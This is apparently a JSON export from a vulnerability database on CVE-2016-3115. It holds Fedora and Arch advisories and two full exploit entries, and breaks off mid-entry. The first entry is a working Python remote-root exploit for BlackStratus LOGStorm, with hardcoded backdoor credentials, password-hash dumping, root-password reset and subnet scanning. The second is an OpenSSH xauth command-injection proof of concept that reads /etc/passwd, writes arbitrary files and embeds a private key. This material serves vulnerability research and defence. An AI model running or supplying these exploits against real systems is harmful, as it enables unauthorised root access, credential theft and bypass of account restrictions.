arbitrary TCP/IP ports can also be forwarded over the secure channel. OpenSSH is OpenBSD's version of the last free version of SSH, bringing it up to date in terms of security and features. This version of OpenSSH has been modified to support GSI authentication. This package includes the core files necessary for both the gsissh client and server. To make this package useful, you should also install gsi-openssh-clients, gsi-openssh-server, or both. ", "modified": "2016-04-25T22:22:47", "published": "2016-04-25T22:22:47", "id": "FEDORA:6A9C96049DE4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: gsi-openssh-6.9p1-8.fc22", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:41", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3115"], "description": "Missing sanitisation of untrusted input allows an authenticated user who\nis able to request X11 forwarding to inject commands to xauth.\n\nInjection of xauth commands grants the ability to read arbitrary files\nunder the authenticated user's privilege. Other xauth commands allow\nlimited information leakage, file overwrite, port probing and generally\nexpose xauth, which was not written with a hostile user in mind, as an\nattack surface.\n\nxauth is run under the user's privilege, so this vulnerability offers no\nadditional access to unrestricted accounts, but could circumvent key or\naccount restrictions such as sshd_config ForceCommand, authorized_keys\ncommand="..." or restricted shells.", "modified": "2016-03-11T00:00:00", "published": "2016-03-11T00:00:00", "id": "ASA-201603-12", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-March/000577.html", "type": "archlinux", "title": "openssh: command injection", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:06", "description": "\nBlackStratus LOGStorm 4.5.1.354.5.1.96 - Remote Code Execution", "edition": 1, "published": "2016-12-04T00:00:00", "title": "BlackStratus LOGStorm 4.5.1.354.5.1.96 - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3115"], "modified": "2016-12-04T00:00:00", "id": "EXPLOITPACK:1902C998CBF9154396911926B4C3B330", "href": "", "sourceData": "#!/usr/bin/python\n# logstorm-root.py\n#\n# BlackStratus LOGStorm Remote Root Exploit\n#\n# Jeremy Brown [jbrown3264/gmail]\n# Dec 2016\n#\n# -Synopsis-\n#\n# \"Better Security and Compliance for Any Size Business\"\n#\n# BlackStratus LOGStorm has multiple vulnerabilities that allow a remote unauthenticated user, among\n# other things, to assume complete control over the virtual appliance with root privileges. This is\n# possible due to multiple network servers listening for network connections by default, allowing\n# authorization with undocumented credentials supported by appliance's OS, web interface and sql server.\n#\n# -Tested-\n#\n# v4.5.1.35\n# v4.5.1.96\n#\n# -Usage-\n#\n# Dependencies: pip install paramiko MySQL-python\n#\n# There are (5) actions provided in this script: root, reset, sql, web and scan.\n#\n# [root] utilizes bug #1 to ssh login to a given <host> as root and run the 'id' command\n# [reset] utilizes bug #2 to ssh login to a given <host> as privileged htinit user and resets the root password\n# [sql*] utilizes bug #3 to sql login to a given <host> as privileged htr user and retrieve web portal credentials\n# [web] utilizes bug #4 to http login to a given <host> as hardcoded webserveruser (presumably) admin account\n# [scan] scans a given <host>/24 for potentially vulnerable appliances\n#\n# *sql only works remotely before license validation as afterwards sql server gets firewalled, becoming local only.\n#\n# Note: this exploit is not and cannot be weaponized simply because exploits are not weapons.\n#\n# -Fixes-\n#\n# BlackStratus did not coherently respond to product security inquiries, so there's no official fix. But\n# customers may (now) root the appliance themselves to change the passwords, disable root login, firewall\n# network services or remove additional user accounts to mitigate these vulnerabilities.. or choose another\n# product altogether because this appliance, as of today, simply adds too much attack surface to the network.\n#\n# -Bonuses-\n#\n# 1) Another account's (htftp/htftp) shell is set to /bin/false, which affords at least a couple attacks\n# \n# 1.1) The appliance is vulnerable to CVE-2016-3115, which we can use to read/write to arbitrary files\n# 1.2) We can use the login to do port forwarding and hit local services, such as the Java instance running\n# in debug mode and probably exploitable with jdwp-shellifer.py (also netcat with -e is installed by default!)\n#\n# 2) More sql accounts: htm/htm_pwd and tvs/tvs_pwd\n#\n\nimport sys\nimport socket\nimport time\nfrom paramiko import ssh_exception\nimport paramiko\nimport MySQLdb\nimport httplib\nimport urllib\n\nSSH_BANNER = \"_/_/_/_/\"\nSSH_PORT = 22\nMYSQL_PORT = 3306\nMYSQL_DB = \"htr\"\nMYSQL_CMD = \"select USER_ID,hex(MD5_PASSWORD) from users;\"\nWEB_URL = \"/tvs/layout/j_security_check\"\n\nROOT_CREDS = [\"root\", \"3!acK5tratu5\"]\nHTINIT_CREDS = [\"htinit\", \"htinit\"]\nMYSQL_CREDS = [\"htr\", \"htr_pwd\"]\nWEB_CREDS = [\"webserviceuser\", \"donotChangeOnInstall\"]\n\n\ndef main():\n if(len(sys.argv) < 2):\n print(\"Usage: %s <action> <host>\" % sys.argv[0])\n print(\"Eg. %s root 10.1.1.3\\n\" % sys.argv[0])\n print(\"Actions: root reset sql web scan\")\n return\n \n action = str(sys.argv[1])\n host = str(sys.argv[2])\n\n if(\"scan\" not in action):\n try:\n socket.inet_aton(host)\n except socket.error:\n print(\"[-] %s doesn't look like a valid ip address\" % host)\n return\n\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n #\n # ssh login as root and execute 'id'\n #\n if(action == \"root\"):\n try:\n ssh.connect(host, SSH_PORT, ROOT_CREDS[0], ROOT_CREDS[1], timeout=SSH_TIMEOUT)\n except ssh_exception.AuthenticationException:\n print(\"\\n[-] Action failed, could not login with root credentials\\n\")\n return\n\n print(\"[+] Success!\")\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(\"id\")\n print(ssh_stdout.readline())\n\n return\n\n #\n # ssh login as htinit and reset root password to the default\n #\n elif(action == \"reset\"):\n print(\"[~] Resetting password on %s...\" % host)\n\n try:\n ssh.connect(host, SSH_PORT, HTINIT_CREDS[0], HTINIT_CREDS[1], timeout=SSH_TIMEOUT)\n except ssh_exception.AuthenticationException:\n print(\"\\n[-] Reset failed, could not login with htinit credentials\\n\")\n return\n\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(\"\")\n\n ssh_stdin.write(\"4\" + \"\\n\")\n time.sleep(2)\n ssh_stdin.write(ROOT_CREDS[1] + \"\\n\")\n time.sleep(2)\n ssh_stdin.write(\"^C\" + \"\\n\")\n time.sleep(1)\n\n print(\"[+] Appliance root password should now be reset\")\n\n return\n\n #\n # sql login as htr and select user/hash columns from the web users table\n #\n elif(action == \"sql\"):\n print(\"[~] Asking %s for it's web users and their password hashes...\" % host)\n\n try:\n db = MySQLdb.connect(host=host, port=MYSQL_PORT, user=MYSQL_CREDS[0], passwd=MYSQL_CREDS[1], db=MYSQL_DB, connect_timeout=3)\n except MySQLdb.Error as error:\n print(\"\\n[-] Failed to connect to %s:\\n%s\\n\" % (host, error))\n return\n\n cursor = db.cursor()\n cursor.execute(MYSQL_CMD)\n\n data = cursor.fetchall()\n\n print(\"[+] Got creds!\\n\")\n\n for row in data:\n print(\"USER_ID: %s\\nMD5_PASSWORD: %s\\n\" % (row[0], row[1]))\n\n db.close()\n\n return\n\n #\n # http login as webserviceuser and gain presumably admin privileges\n #\n elif(action == \"web\"):\n print(\"[~] Attempting to login as backdoor web user at %s...\" % host)\n\n try: \n client = httplib.HTTPSConnection(host)\n except:\n print(\"[-] Couldn't establish SSL connection to %s\" % host)\n return\n\n params = urllib.urlencode({\"j_username\" : WEB_CREDS[0], \"j_password\" : WEB_CREDS[1]})\n headers = {\"Host\" : host, \"Content-Type\" : \"application/x-www-form-urlencoded\", \"Content-Length\" : \"57\"}\n\n client.request(\"POST\", WEB_URL, params, headers)\n\n response = client.getresponse()\n\n if(response.status == 408):\n print(\"[+] Success!\")\n else:\n print(\"[-] Service returned %d %s, which is actually not our criteria for success\" % (response.status, response.reason))\n\n return\n\n #\n # check the ssh network banner to identify appliances within range of <host>/24\n #\n elif(action == \"scan\"):\n count = 0\n print(\"[~] Scanning %s for LOGStorm appliances...\" % sys.argv[2])\n\n for x in range(1,255):\n banner = None\n\n #\n # 10.1.1.1/24 -> 10.1.1.[x]\n #\n host = str(sys.argv[2]).split('/')[0][:-1] + str(x)\n\n try:\n ssh.connect(host, SSH_PORT, \"user-that-doesnt-exist\", \"pass-that-doesnt-work\", timeout=2)\n except ssh_exception.NoValidConnectionsError:\n pass\n except socket.timeout:\n pass\n except ssh_exception.AuthenticationException as error:\n banner = ssh._transport.get_banner()\n if banner and SSH_BANNER in banner:\n print(\"[!] %s\\n\" % host)\n count+=1\n\n print(\"[+] Found %d appliance(s)\"% count)\n\n return\n\n \nif __name__ == \"__main__\":\n main()", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSH 7.2p1 - (Authenticated) xauth Command Injection", "edition": 1, "published": "2016-03-16T00:00:00", "title": "OpenSSH 7.2p1 - (Authenticated) xauth Command Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3115"], "modified": "2016-03-16T00:00:00", "id": "EXPLOITPACK:9F2E746846C3C623A27A441281EAD138", "href": "", "sourceData": "'''\nAuthor: <github.com/tintinweb>\nRef: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115\nVersion: 0.2\nDate: Mar 3rd, 2016\n\nTag: openssh xauth command injection may lead to forced-command and /bin/false bypass\n\nOverview\n--------\n\nName: openssh\nVendor: OpenBSD\nReferences: * http://www.openssh.com/[1]\n\nVersion: 7.2p1 [2]\nLatest Version: 7.2p1\nOther Versions: <= 7.2p1 (all versions; dating back ~20 years)\nPlatform(s): linux\nTechnology: c\n\nVuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')\nOrigin: remote\nMin. Privs.: post auth\n\nCVE: CVE-2016-3115\n\n\n\nDescription\n---------\n\nquote website [1]\n\n> OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options.\nSummary\n-------\n\nAn authenticated user may inject arbitrary xauth commands by sending an\nx11 channel request that includes a newline character in the x11 cookie.\nThe newline acts as a command separator to the xauth binary. This attack requires\nthe server to have 'X11Forwarding yes' enabled. Disabling it, mitigates this vector.\n\nBy injecting xauth commands one gains limited* read/write arbitrary files,\ninformation leakage or xauth-connect capabilities. These capabilities can be\nleveraged by an authenticated restricted user - e.g. one with the login shell\nconfigured as /bin/false or one with configured forced-commands - to bypass\naccount restriction. This is generally not expected.\n\nThe injected xauth commands are performed with the effective permissions of the\nlogged in user as the sshd already dropped its privileges.\n\nQuick-Info:\n\n* requires: X11Forwarding yes\n* bypasses /bin/false and forced-commands\n** OpenSSH does not treat /bin/false like /bin/nologin (in contrast to Dropbear)\n* does not bypass /bin/nologin (as there is special treatment for this)\n\nCapabilities (xauth):\n\n* Xauth\n\t* write file: limited chars, xauthdb format\n\t* read file: limit lines cut at first \\s\n\t* infoleak: environment\n\t* connect to other devices (may allow port probing)\n\n\nPoC see ref github.\nPatch see ref github.\n\n\nDetails\n-------\n\n// see annotated code below\n\n * server_input_channel_req (serverloop.c)\n *- session_input_channel_req:2299 (session.c [2])\n *- session_x11_req:2181\n\n * do_exec_pty or do_exec_no_pty\n *- do_child\n *- do_rc_files (session.c:1335 [2])\n\nUpon receiving an `x11-req` type channel request sshd parses the channel request\nparameters `auth_proto` and `auth_data` from the client ssh packet where\n`auth_proto` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`)\nand `auth_data` contains the actual x11 auth cookie. This information is stored\nin a session specific datastore. When calling `execute` on that session, sshd will\ncall `do_rc_files` which tries to figure out if this is an x11 call by evaluating\nif `auth_proto` and `auth_data` (and `display`) are set. If that is the case AND\nthere is no system `/sshrc` existent on the server AND it no user-specific `$HOME/.ssh/rc`\nis set, then `do_rc_files` will run `xauth -q -` and pass commands via `stdin`.\nNote that `auth_data` nor `auth_proto` was sanitized or validated, it just contains\nuser-tainted data. Since `xauth` commands are passed via `stdin` and `\\n` is a\ncommand-separator to the `xauth` binary, this allows a client to inject arbitrary\n`xauth` commands.\n\nSidenote #1: in case sshd takes the `$HOME/.ssh/rc` branch, it will pass the tainted\ninput as arguments to that script.\nSidenote #2: client code also seems to not sanitize `auth_data`, `auth_proto`. [3]\n\nThis is an excerpt of the `man xauth` [4] to outline the capabilities of this xauth\ncommand injection:\n\n\tSYNOPSIS\n \txauth [ -f authfile ] [ -vqibn ] [ command arg ... ]\n\n\t\tadd displayname protocolname hexkey\n\t\tgenerate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]\n\t\t[n]extract filename displayname...\n\t\t[n]list [displayname...]\n\t\t[n]merge [filename...]\n\t\tremove displayname...\n\t\tsource filename\n\t\tinfo\n\t\texit\n\t\tquit\n\t\tversion\n\t\thelp\n\t\t?\n\t\t\nInteresting commands are:\n\t\n\tinfo\t - leaks environment information / path\n\t\t\t~# xauth info\n\t\t\txauth: file /root/.Xauthority does not exist\n\t\t\tAuthority file: /root/.Xauthority\n\t\t\tFile new: yes\n\t\t\tFile locked: no\n\t\t\tNumber of entries: 0\n\t\t\tChanges honored: yes\n\t\t\tChanges made: no\n\t\t\tCurrent input: (argv):1\n\t\n\tsource\t - arbitrary file read (cut on first `\\s`)\n\t\t\t# xauth source /etc/shadow\n\t\t\txauth: file /root/.Xauthority does not exist\n\t\t\txauth: /etc/shadow:1: unknown command \"smithj:Ep6mckrOLChF.:10063:0:99999:7:::\"\n\t\t\t\t\t\t\n\textract - arbitrary file write\n\t\t\t * limited characters\n\t * in xauth.db format\n\t * since it is not compressed it can be combined with `xauth add` to\n\t first store data in the database and then export it to an arbitrary\n\t location e.g. to plant a shell or do other things.\n\t\n\tgenerate - connect to <ip>:<port> (port probing, connect back and pot. exploit\n\t\t\t vulnerabilities in X.org\n\t\n\t\nSource\n------\n\nInline annotations are prefixed with `//#!`\n\n\n/*\n * Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found\n * first in this order).\n */\nstatic void\ndo_rc_files(Session *s, const char *shell)\n{\n...\n\t\tsnprintf(cmd, sizeof cmd, \"%s -q -\",\t\t\t\t\n\t\t options.xauth_location);\n\t\tf = popen(cmd, \"w\");\t\t\t\t\t\t\t//#! run xauth -q -\n\t\tif (f) {\n\t\t\tfprintf(f, \"remove %s\\n\",\t\t\t\t\t//#! remove <user_tainted_data> - injecting \\n auth_display injects xauth command\n\t\t\t s->auth_display);\n\t\t\tfprintf(f, \"add %s %s %s\\n\",\t\t\t\t//#! \\n injection\n\t\t\t s->auth_display, s->auth_proto,\n\t\t\t s->auth_data);\n\t\t\tpclose(f);\n\t\t} else {\n\t\t\tfprintf(stderr, \"Could not run %s\\n\",\n\t\t\t cmd);\n\t\t}\n\t}\n}\n\nProof of Concept\n----------------\n\nPrerequisites:\n\n* install python 2.7.x\n* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x\n* make sure `poc.py`\n\n\n Usage: <host> <port> <username> <password or path_to_privkey>\n\n path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key\n\n\npoc:\n\n1. configure one user (user1) for `force-commands` and another one with `/bin/false` in `/etc/passwd`:\n\n#PUBKEY line - force commands: only allow \"whoami\"\n#cat /home/user1/.ssh/authorized_keys\ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box\n\n#cat /etc/passwd\nuser2:x:1001:1002:,,,:/home/user2:/bin/false\n\t\n2. run sshd with `X11Forwarding yes` (kali default config)\n\n#> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d\n\n3. `forced-commands` - connect with user1 and display env information\n\n#> python <host> 22 user1 .demoprivkey\n\nINFO:__main__:add this line to your authorized_keys file:\n#PUBKEY line - force commands: only allow \"whoami\"\n#cat /home/user/.ssh/authorized_keys\ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box\n\nINFO:__main__:connecting to: user1:<PKEY>@host:22\nINFO:__main__:connected!\nINFO:__main__:\nAvailable commands:\n .info\n .readfile <path>\n .writefile <path> <data>\n .exit .quit\n <any xauth command or type help>\n\n#> .info\nDEBUG:__main__:auth_cookie: '\\ninfo'\nDEBUG:__main__:dummy exec returned: None\nINFO:__main__:Authority file: /home/user1/.Xauthority\nFile new: no\nFile locked: no\nNumber of entries: 1\nChanges honored: yes\nChanges made: no\nCurrent input: (stdin):3\n/usr/bin/xauth: (stdin):2: bad \"add\" command line\n...\n\t\t\n4. `forced-commands` - read `/etc/passwd`\n\n...\n#> .readfile /etc/passwd\nDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\nDEBUG:__main__:dummy exec returned: None\nINFO:__main__:root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\n...\n\n5. `forced-commands` - write `/tmp/testfile`\n\n#> .writefile /tmp/testfile `thisisatestfile`\nDEBUG:__main__:auth_cookie: '\\nadd 127.0.0.250:65500 `thisisatestfile` aa'\nDEBUG:__main__:dummy exec returned: None\nDEBUG:__main__:auth_cookie: '\\nextract /tmp/testfile 127.0.0.250:65500'\nDEBUG:__main__:dummy exec returned: None\nDEBUG:__main__:/usr/bin/xauth: (stdin):2: bad \"add\" command line\n\n#> ls -lsat /tmp/testfile\n4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile\n\n#> cat /tmp/testfile\n\\FA65500hi\\FA65500`thisisatestfile`\\AA\n\n6. `/bin/false` - connect and read `/etc/passwd`\n\n#> python <host> 22 user2 user2password\nINFO:__main__:connecting to: user2:user2password@host:22\nINFO:__main__:connected!\nINFO:__main__:\nAvailable commands:\n .info\n .readfile <path>\n .writefile <path> <data>\n .exit .quit\n <any xauth command or type help>\n\n#> .readfile /etc/passwd\nDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\nDEBUG:__main__:dummy exec returned: None\nINFO:__main__:root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\n...\nuser2:x:1001:1002:,,,:/home/user2:/bin/false\n...\n\t\n7. `/bin/false` - initiate outbound X connection to 8.8.8.8:6100\n\n#> generate 8.8.8.8:100 .\t\n\n#> tcpdump\nIP <host>.42033 > 8.8.8.8.6100: Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr 0,nop,wscale 10], length 0\n\t\n\nMitigation / Workaround\n------------------------\n\n* disable x11-forwarding: `sshd_config` set `X11Forwarding no`\n* disable x11-forwarding for specific user with forced-commands: `no-x11-forwarding` in `authorized_keys`\n\nNotes\n-----\n\nVerified, resolved and released within a few days. very impressive.\n\nVendor response: see advisory [5]\n\nReferences\n----------\n\n[1] http://www.openssh.com/\n[2] https://github.com/openssh/openssh-portable/blob/5a0fcb77287342e2fc2ba1cee79b6af108973dc2/session.c#L1388\n[3] https://github.com/openssh/openssh-portable/blob/19bcf2ea2d17413f2d9730dd2a19575ff86b9b6a/clientloop.c#L376\n[4] http://linux.die.net/man/1/xauth\n[5] http://www.openssh.com/txt/x11fwd.adv\n'''\n\n#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n# Author : <github.com/tintinweb>\n###############################################################################\n#\n# FOR DEMONSTRATION PURPOSES ONLY!\n#\n###############################################################################\nimport logging\nimport StringIO\nimport sys\nimport os\n\nLOGGER = logging.getLogger(__name__)\ntry:\n import paramiko\nexcept ImportError, ie:\n logging.exception(ie)\n logging.warning(\"Please install python-paramiko: pip install paramiko / easy_install paramiko / <distro_pkgmgr> install python-paramiko\")\n sys.exit(1)\n\nclass SSHX11fwdExploit(object):\n def __init__(self, hostname, username, password, port=22, timeout=0.5, \n pkey=None, pkey_pass=None):\n self.ssh = paramiko.SSHClient()\n self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n if pkey:\n pkey = paramiko.RSAKey.from_private_key(StringIO.StringIO(pkey),pkey_pass)\n self.ssh.connect(hostname=hostname, port=port, \n username=username, password=password, \n timeout=timeout, banner_timeout=timeout,\n look_for_keys=False, pkey=pkey)\n \n def exploit(self, cmd=\"xxxx\\n?\\nsource /etc/passwd\\n\"):\n transport = self.ssh.get_transport()\n session = transport.open_session()\n LOGGER.debug(\"auth_cookie: %s\"%repr(cmd))\n session.request_x11(auth_cookie=cmd)\n LOGGER.debug(\"dummy exec returned: %s\"%session.exec_command(\"\"))\n \n transport.accept(0.5)\n session.recv_exit_status() # block until exit code is ready\n stdout, stderr = [],[]\n while session.recv_ready():\n stdout.append(session.recv(4096))\n while session.recv_stderr_ready():\n stderr.append(session.recv_stderr(4096))\n session.close()\n return ''.join(stdout)+''.join(stderr) # catch stdout, stderr\n \n def exploit_fwd_readfile(self, path):\n data = self.exploit(\"xxxx\\nsource %s\\n\"%path)\n if \"unable to open file\" in data:\n raise IOError(data)\n ret = []\n for line in data.split('\\n'):\n st = line.split('unknown command \"',1)\n if len(st)==2:\n ret.append(st[1].strip(' \"'))\n return '\\n'.join(ret)\n \n def exploit_fwd_write_(self, path, data):\n '''\n adds display with protocolname containing userdata. badchars=<space>\n \n '''\n dummy_dispname = \"127.0.0.250:65500\"\n ret = self.exploit('\\nadd %s %s aa'%(dummy_dispname, data))\n if ret.count('bad \"add\" command line')>1:\n raise Exception(\"could not store data most likely due to bad chars (no spaces, quotes): %s\"%repr(data))\n LOGGER.debug(self.exploit('\\nextract %s %s'%(path,dummy_dispname)))\n return path\n \ndemo_authorized_keys = '''#PUBKEY line - force commands: only allow \"whoami\"\n#cat /home/user/.ssh/authorized_keys\ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box\n''' \nPRIVKEY = \"\"\"-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEAtUaWCq7z5CM7wGH1/2XlNVMy7glVgYCVHjf8BUZo+FypdD69\n9SPu06CZ3e0vSUx5KxlQ7vgU6CtH9nQli53oMy225a/RUGEon/axzVtwTpMnVLqn\nPLEUn9zPaCjwwpg/Brhr5+NHc3bm/u/LHmKrEg6IjyWssE16exuhA3G/Teed+NaN\nzKR3jVLrmXohc9dp57jYBPLZJ5NSojsd27LjdWnq/PokxwvkQOrOPkhTne+7GRts\nU68nW5a99jMSb4bpgqsUsIY0IIsKc1nfzUxonvcXmh+RASIffLCzA0OdQyJ7UrPh\nTLw8dVOK2e9zsJYlOYUA6G3rnzq9sNmqe7XdeQIDAQABAoIBAHu5M4sTIc8h5RRH\nSBkKuMgOgwJISJ3c3uoDF/WZuudYhyeZ8xivb7/tK1d3HQEQOtsZqk2P8OUNNU6W\ns1F5cxQLLXvS5i/QQGP9ghlBQYO/l+aShrY7vnHlyYGz/68xLkMt+CgKzaeXDc4O\naDnS6iOm27mn4xdpqiEAGIM7TXCjcPSQ4l8YPxaj84rHBcD4w033Sdzc7i73UUne\neuQL7bBz5xNibOIFPY3h4q6fbw4bJtPBzAB8c7/qYhJ5P3czGxtqhSqQRogK8T6T\nA7fGezF90krTGOAz5zJGV+F7+q0L9pIR+uOg+OBFBBmgM5sKRNl8pyrBq/957JaA\nrhSB0QECgYEA1604IXr4CzAa7tKj+FqNdNJI6jEfp99EE8OIHUExTs57SaouSjhe\nDDpBRSTX96+EpRnUSbJFnXZn1S9cZfT8i80kSoM1xvHgjwMNqhBTo+sYWVQrfBmj\nbDVVbTozREaMQezgHl+Tn6G1OuDz5nEnu+7gm1Ud07BFLqi8Ssbhu2kCgYEA1yrc\nKPIAIVPZfALngqT6fpX6P7zHWdOO/Uw+PoDCJtI2qljpXHXrcI4ZlOjBp1fcpBC9\n2Q0TNUfra8m3LGbWfqM23gTaqLmVSZSmcM8OVuKuJ38wcMcNG+7DevGYuELXbOgY\nnimhjY+3+SXFWIHAtkJKAwZbPO7p857nMcbBH5ECgYBnCdx9MlB6l9rmKkAoEKrw\nGt629A0ZmHLftlS7FUBHVCJWiTVgRBm6YcJ5FCcRsAsBDZv8MW1M0xq8IMpV83sM\nF0+1QYZZq4kLCfxnOTGcaF7TnoC/40fOFJThgCKqBcJQZKiWGjde1lTM8lfTyk+f\nW3p2+20qi1Yh+n8qgmWpsQKBgQCESNF6Su5Rjx+S4qY65/spgEOOlB1r2Gl8yTcr\nbjXvcCYzrN4r/kN1u6d2qXMF0zrPk4tkumkoxMK0ThvTrJYK3YWKEinsucxSpJV/\nnY0PVeYEWmoJrBcfKTf9ijN+dXnEdx1LgATW55kQEGy38W3tn+uo2GuXlrs3EGbL\nb4qkQQKBgF2XUv9umKYiwwhBPneEhTplQgDcVpWdxkO4sZdzww+y4SHifxVRzNmX\nAo8bTPte9nDf+PhgPiWIktaBARZVM2C2yrKHETDqCfme5WQKzC8c9vSf91DSJ4aV\npryt5Ae9gUOCx+d7W2EU7RIn9p6YDopZSeDuU395nxisfyR1bjlv\n-----END RSA PRIVATE KEY-----\"\"\"\n\n\nif __name__==\"__main__\":\n logging.basicConfig(loglevel=logging.DEBUG)\n LOGGER.setLevel(logging.DEBUG)\n \n if not len(sys.argv)>4:\n print \"\"\" Usage: <host> <port> <username> <password or path_to_privkey>\n \n path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key\n \n\"\"\"\n sys.exit(1)\n hostname, port, username, password = sys.argv[1:]\n port = int(port)\n pkey = None\n if os.path.isfile(password):\n password = None\n with open(password,'r') as f:\n pkey = f.read()\n elif password==\".demoprivkey\":\n pkey = PRIVKEY\n password = None\n LOGGER.info(\"add this line to your authorized_keys file: \\n%s\"%demo_authorized_keys)\n \n LOGGER.info(\"connecting to: %s:%s@%s:%s\"%(username,password if not pkey else \"<PKEY>\", hostname, port))\n ex = SSHX11fwdExploit(hostname, port=port,\n username=username, password=password,\n pkey=pkey,\n timeout=10\n )\n LOGGER.info(\"connected!\")\n LOGGER.info (\"\"\"\nAvailable commands:\n .info\n .readfile <path>\n .writefile <path> <data>\n .exit .quit\n <any xauth command or type help>\n\"\"\")\n while True:\n cmd = raw_input(\"#> \").strip()\n if cmd.lower().startswith(\".exit\") or cmd.lower().startswith(\".quit\"):\n break\n elif cmd.lower().startswith(\".info\"):\n LOGGER.info(ex.exploit(\"\\ninfo\"))\n elif cmd.lower().startswith(\".readfile\"): \n LOGGER.info(ex.exploit_fwd_readfile(cmd.split(\" \",1)[1]))\n elif cmd.lower().startswith(\".writefile\"):\n parts = cmd.split(\" \")\n LOGGER.info(ex.exploit_fwd_write_(parts[1],' '.join(parts[2:])))\n else:\n LOGGER.info(ex.exploit('\\n%s'%cmd))\n \n # just playing around \n #print ex.exploit_fwd_readfile(\"/etc/passwd\")\n #print ex.exploit(\"\\ninfo\")\n #print ex.exploit(\"\\ngenerate <ip>:600<port> .\") # generate <ip>:port port=port+6000\n #print ex.exploit(\"\\nlist\")\n #print ex.exploit(\"\\nnlist\")\n #print ex.exploit('\\nadd xx xx \"\\n')\n #print ex.exploit('\\ngenerate :0 . data \"')\n #print ex.exploit('\\n?\\n')\n #print ex.exploit_fwd_readfile(\"/etc/passwd\")\n #print ex.exploit_fwd_write_(\"/tmp/somefile\", data=\"`whoami`\")\n LOGGER.info(\"--quit--\")", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-04-01T19:04:13", "description": "\nDropBearSSHD 2015.71 - Command Injection", "edition": 1, "published": "2016-03-03T00:00:00", "title": "DropBearSSHD 2015.71 - Command 